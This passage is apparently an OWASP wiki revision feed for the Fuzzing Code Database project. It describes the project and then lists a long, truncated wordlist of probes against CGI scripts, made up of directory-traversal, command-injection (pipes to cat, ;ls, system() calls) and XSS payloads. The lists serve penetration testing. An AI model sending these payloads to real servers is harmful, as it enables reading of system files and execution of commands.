| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80077</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80077"/>
				<updated>2010-03-17T21:10:26Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Generic 8 Directory Deep Traversal Fuzz (77 March 2010) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
